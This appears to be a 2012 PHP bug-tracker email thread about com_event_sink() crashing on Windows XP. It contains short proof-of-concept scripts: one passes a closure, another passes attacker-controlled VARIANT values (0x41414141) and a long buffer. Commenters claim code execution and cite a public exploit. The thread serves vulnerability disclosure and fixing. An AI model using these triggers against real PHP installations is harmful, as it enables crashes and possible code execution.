Bug #62474 [Com]: com_event_sink crashes when closure object given as an argument

Fri, 27 Jul 2012 13:43:42 -0700 

Edit report at https://bugs.php.net/bug.php?id=62474&edit=1

 ID:                 62474
 Comment by:         fb1h2s at gmail dot com
 Reported by:        deadb17ch at gmail dot com
 Summary:            com_event_sink crashes when closure object given as
                     an argument
 Status:             Open
 Type:               Bug
 Package:            COM related
 Operating System:   Windows XP SP3
 PHP Version:        5.4.4
 Block user comment: N
 Private report:     N

 New Comment:

Oh yea my mistake I was referring to arg 1 crash, dint see a Bug Id open for 
that here though.

<?php


$buffer = str_repeat("A", 1000);


$vVar = new VARIANT(0x41414141); // We controll this
$vVar2 = new VARIANT(0x41414141); // 


com_event_sink($vVar, $vVar2 , $buffer );

?>


Previous Comments:
------------------------------------------------------------------------
[2012-07-26 13:43:04] deadb17ch at gmail dot com

I know. I have send an advisory about possible code execution  in 
com_event_sink()  
function using VARIANT object to bugtraq some time ago (21 May) :

http://cxsecurity.com/issue/WLB-2012050163
http://www.exploit-db.com/exploits/18910/

but this time it is about bug in second argument, not first.

------------------------------------------------------------------------
[2012-07-26 13:32:17] fb1h2s at gmail dot com

It's possible to achieve code execution using this bug. 

$_evil_object = new VARIANT(0x41414141);

------------------------------------------------------------------------
[2012-07-03 20:18:20] deadb17ch at gmail dot com

Description:
------------
com_event_sink() crashes when closure object (anonymouse function) is given as 
the 
second argument...

Test script:
---------------
<?php

$__evil = function() { };

com_event_sink(
        /* variant */   new Variant(),
        /* object  */   $__evil,                        // oink!
        /* mixed   */   array()
);

?>

Expected result:
----------------
nothing happends or an information about error (or maybe argument type 
mismatch) 
occurs


Actual result:
--------------
crash

eax=00000000 ebx=010328f0 ecx=00000000 edx=00000001 esi=0121e438 edi=00000000
eip=100f33c8 esp=00c0fa50 ebp=00000000 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\xampp\php\php5ts.dll - 
php5ts!php_com_load_typelib_via_cache+0x118:
100f33c8 8b08            mov     ecx,dword ptr [eax]  ds:0023:00000000=???????? 


------------------------------------------------------------------------



-- 
Edit this bug report at https://bugs.php.net/bug.php?id=62474&edit=1

Reply via email to